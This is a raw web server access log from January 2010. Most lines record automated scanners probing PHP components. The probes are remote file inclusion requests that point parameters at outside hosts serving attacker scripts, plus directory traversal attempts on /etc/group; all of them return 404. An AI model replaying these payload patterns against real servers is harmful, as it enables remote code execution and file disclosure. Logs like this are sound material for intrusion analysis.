211.115.213.195 - - [05/Jan/2010:01:45:56 -0500] "GET /logs/access_log.Q109072400//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
211.115.213.195 - - [05/Jan/2010:01:45:56 -0500] "GET /logs/access_log.Q109080100//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
211.115.213.195 - - [05/Jan/2010:01:45:56 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.53.110.2 - - [05/Jan/2010:01:46:11 -0500] "GET /logs/error_log.Q109060200//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 259 "-" "-"
74.53.110.2 - - [05/Jan/2010:01:46:11 -0500] "GET /logs/error_log.Q109060200//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 259 "-" "-"
188.93.208.12 - - [05/Jan/2010:01:46:39 -0500] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
188.93.208.12 - - [05/Jan/2010:01:46:39 -0500] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
188.93.208.12 - - [05/Jan/2010:01:46:39 -0500] "GET /logs/access_log.Q109091700/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
170.210.192.78 - - [05/Jan/2010:01:46:46 -0500] "GET /logs/access_log.Q109080100//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
64.34.177.222 - - [05/Jan/2010:01:46:56 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
64.34.177.222 - - [05/Jan/2010:01:46:56 -0500] "GET /logs/access_log.Q109072400//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
64.34.177.222 - - [05/Jan/2010:01:46:56 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
212.175.5.130 - - [05/Jan/2010:01:46:57 -0500] "GET /logs/access_log.Q109072400//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
212.175.5.130 - - [05/Jan/2010:01:46:57 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
212.175.5.130 - - [05/Jan/2010:01:46:57 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.53.110.2 - - [05/Jan/2010:01:46:59 -0500] "GET /logs/error_log.Q109050900//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 259 "-" "-"
74.53.110.2 - - [05/Jan/2010:01:46:59 -0500] "GET /logs/error_log.Q109050900//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 259 "-" "-"
212.175.5.130 - - [05/Jan/2010:01:47:01 -0500] "GET /logs/access_log.Q109080100//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
64.34.177.222 - - [05/Jan/2010:01:47:04 -0500] "GET /logs/access_log.Q109080100//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
65.55.207.76 - - [05/Jan/2010:01:47:43 -0500] "GET /robots.txt HTTP/1.1" 404 208 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
202.131.226.52 - - [05/Jan/2010:01:48:14 -0500] "GET /logs/access_log.Q109112600%20%20////setup.php?setup[use_category]=1&dir=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
202.131.226.52 - - [05/Jan/2010:01:48:31 -0500] "GET /logs/access_log.Q109112600////setup.php?setup[use_category]=1&dir=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.47.176.206 - - [05/Jan/2010:01:49:03 -0500] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
211.47.176.206 - - [05/Jan/2010:01:49:03 -0500] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
65.55.207.76 - - [05/Jan/2010:01:48:35 -0500] "GET /logs/access_log.Q109112200 HTTP/1.1" 200 2187328 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.47.176.206 - - [05/Jan/2010:01:49:06 -0500] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
211.47.176.206 - - [05/Jan/2010:01:49:06 -0500] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
64.34.177.222 - - [05/Jan/2010:01:49:17 -0500] "GET /logs/access_log.Q109072400%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
64.34.177.222 - - [05/Jan/2010:01:49:17 -0500] "GET /logs/access_log.Q109080100%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
212.175.5.130 - - [05/Jan/2010:01:49:50 -0500] "GET /logs/access_log.Q109072400%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
212.175.5.130 - - [05/Jan/2010:01:49:54 -0500] "GET /logs/access_log.Q109080100%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
211.115.213.195 - - [05/Jan/2010:01:50:00 -0500] "GET /logs/access_log.Q109052900%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
211.115.213.195 - - [05/Jan/2010:01:50:01 -0500] "GET /logs/access_log.Q109080100%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
209.59.12.99 - - [05/Jan/2010:01:50:39 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
95.108.128.242 - - [05/Jan/2010:01:52:09 -0500] "GET /logs/error_log.Q109112000 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
188.93.208.12 - - [05/Jan/2010:01:53:15 -0500] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.camoplast.com/pdf/1.gif? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
188.93.208.12 - - [05/Jan/2010:01:53:25 -0500] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.camoplast.com/pdf/1.gif? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
188.93.208.12 - - [05/Jan/2010:01:53:25 -0500] "GET /logs/access_log.Q109110300/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.camoplast.com/pdf/1.gif? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
188.93.208.12 - - [05/Jan/2010:01:53:37 -0500] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.camoplast.com/pdf/1.gif? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
188.93.208.12 - - [05/Jan/2010:01:53:37 -0500] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.camoplast.com/pdf/1.gif? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
188.93.208.12 - - [05/Jan/2010:01:53:37 -0500] "GET /logs/access_log.Q109110300/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.camoplast.com/pdf/1.gif? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
188.93.208.12 - - [05/Jan/2010:01:54:04 -0500] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.camoplast.com/pdf/1.gif? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
188.93.208.12 - - [05/Jan/2010:01:54:04 -0500] "GET /logs/access_log.Q109110300%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.camoplast.com/pdf/1.gif? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
188.93.208.12 - - [05/Jan/2010:01:54:04 -0500] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.camoplast.com/pdf/1.gif? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
222.122.157.111 - - [05/Jan/2010:01:54:23 -0500] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.ferieispania.no/calendar/events/1.gif?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
222.122.157.111 - - [05/Jan/2010:01:54:23 -0500] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.ferieispania.no/calendar/events/1.gif?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
222.122.157.111 - - [05/Jan/2010:01:54:23 -0500] "GET /logs/access_log.Q109110300%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.ferieispania.no/calendar/events/1.gif?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
194.105.128.135 - - [05/Jan/2010:01:54:47 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 229 "-" "libwww-perl/5.79"
194.105.128.135 - - [05/Jan/2010:01:54:47 -0500] "GET /logs/access_log.Q109091600//include/admin.lib.inc.php?site_path=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
194.105.128.135 - - [05/Jan/2010:01:54:47 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.79"
194.105.128.135 - - [05/Jan/2010:01:55:01 -0500] "GET /logs/error_log.Q109091600//include/admin.lib.inc.php?site_path=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
209.59.12.99 - - [05/Jan/2010:01:55:40 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
115.68.3.94 - - [05/Jan/2010:01:55:42 -0500] "GET /logs/access_log.Q109052100//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:01:55:42 -0500] "GET /logs//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:01:55:43 -0500] "GET //delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:01:56:03 -0500] "GET /logs/access_log.Q109101600//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
66.249.65.7 - - [05/Jan/2010:01:56:11 -0500] "GET /images/Office%20Supply/bt_right-b.gif HTTP/1.1" 200 287 "-" "Googlebot-Image/1.0"
115.68.3.94 - - [05/Jan/2010:01:56:32 -0500] "GET /logs/access_log.Q109052100//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:01:56:33 -0500] "GET //delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:01:56:33 -0500] "GET /logs//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:01:56:45 -0500] "GET /logs/access_log.Q109051800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:01:56:45 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:01:56:45 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:01:56:45 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:01:56:45 -0500] "GET /logs/access_log.Q109051800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:01:56:45 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:01:56:51 -0500] "GET /logs/access_log.Q109101600//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:01:57:02 -0500] "GET /logs/access_log.Q109071100//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:01:57:04 -0500] "GET /logs/access_log.Q109071100//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
67.195.114.54 - - [05/Jan/2010:01:57:05 -0500] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.114.54 - - [05/Jan/2010:01:57:05 -0500] "GET /images/_notes/contact_phone_over.jpg.mno HTTP/1.0" 200 250 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.53.110.2 - - [05/Jan/2010:01:57:29 -0500] "GET /logs/access_log.Q109101500%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 261 "-" "-"
74.53.110.2 - - [05/Jan/2010:01:57:29 -0500] "GET /logs/access_log.Q109101500%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 261 "-" "-"
67.19.194.26 - - [05/Jan/2010:01:58:01 -0500] "GET /logs/error_log.Q109081700%20%20//write.php?dir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:01:58:01 -0500] "GET /logs//write.php?dir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:01:58:01 -0500] "GET //write.php?dir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:01:58:05 -0500] "GET //write.php?dir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:01:58:05 -0500] "GET /logs//write.php?dir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:01:58:05 -0500] "GET /logs/error_log.Q109081700%20%20//write.php?dir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:01:58:06 -0500] "GET /logs/access_log.Q109081700%20%20//write.php?dir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:01:58:12 -0500] "GET /logs/access_log.Q109081700%20%20//write.php?dir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:01:58:34 -0500] "GET /logs/error_log.Q109081700//write.php?dir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:01:58:34 -0500] "GET /logs/access_log.Q109081700//write.php?dir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.195.114.54 - - [05/Jan/2010:01:58:48 -0500] "GET /images/_notes/nav_store_cart_off_r1_c5.jpg.mno HTTP/1.0" 200 211 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.19.194.26 - - [05/Jan/2010:01:59:19 -0500] "GET /logs/error_log.Q109081700//write.php?dir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:01:59:23 -0500] "GET /logs/access_log.Q109081700//write.php?dir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:01:59:26 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:01:59:26 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:01:59:26 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:01:59:26 -0500] "GET /logs/access_log.Q109120900/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:01:59:26 -0500] "GET /logs/access_log.Q109091300/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:01:59:26 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
94.124.120.47 - - [05/Jan/2010:01:59:26 -0500] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
94.124.120.47 - - [05/Jan/2010:01:59:26 -0500] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
94.124.120.47 - - [05/Jan/2010:01:59:26 -0500] "GET /logs/access_log.Q109091700%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:01:59:26 -0500] "GET /logs/access_log.Q109120900/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:01:59:26 -0500] "GET /logs/access_log.Q109091300/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
94.124.120.47 - - [05/Jan/2010:01:59:31 -0500] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
94.124.120.47 - - [05/Jan/2010:01:59:31 -0500] "GET /logs/access_log.Q109091700%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
94.124.120.47 - - [05/Jan/2010:01:59:31 -0500] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
94.124.120.47 - - [05/Jan/2010:01:59:38 -0500] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
94.124.120.47 - - [05/Jan/2010:01:59:38 -0500] "GET /logs/access_log.Q109091700%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
94.124.120.47 - - [05/Jan/2010:01:59:38 -0500] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:01:59:49 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:01:59:49 -0500] "GET /logs/access_log.Q109120900%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:01:59:49 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
193.93.98.146 - - [05/Jan/2010:01:59:54 -0500] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
193.93.98.146 - - [05/Jan/2010:01:59:54 -0500] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
193.93.98.146 - - [05/Jan/2010:01:59:58 -0500] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
193.93.98.146 - - [05/Jan/2010:01:59:58 -0500] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
211.255.32.182 - - [05/Jan/2010:02:00:02 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:02:00:02 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:02:00:02 -0500] "GET /logs/access_log.Q109120900%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
95.108.128.242 - - [05/Jan/2010:02:00:02 -0500] "GET /logs/error_log.Q109071400 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
211.255.32.182 - - [05/Jan/2010:02:00:04 -0500] "GET /logs/access_log.Q109081400%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
74.53.110.2 - - [05/Jan/2010:02:00:18 -0500] "GET /logs/access_log.Q109112600//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 260 "-" "-"
74.53.110.2 - - [05/Jan/2010:02:00:18 -0500] "GET /logs/access_log.Q109112600//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 260 "-" "-"
211.255.32.182 - - [05/Jan/2010:02:00:20 -0500] "GET /logs/access_log.Q109081400%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
209.59.12.99 - - [05/Jan/2010:02:00:39 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
115.68.3.94 - - [05/Jan/2010:02:02:14 -0500] "GET //delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:02:02:15 -0500] "GET /logs/access_log.Q109052100%20%20//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:02:02:16 -0500] "GET /logs//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:02:02:16 -0500] "GET /logs/access_log.Q109052100//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:02:02:18 -0500] "GET //delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
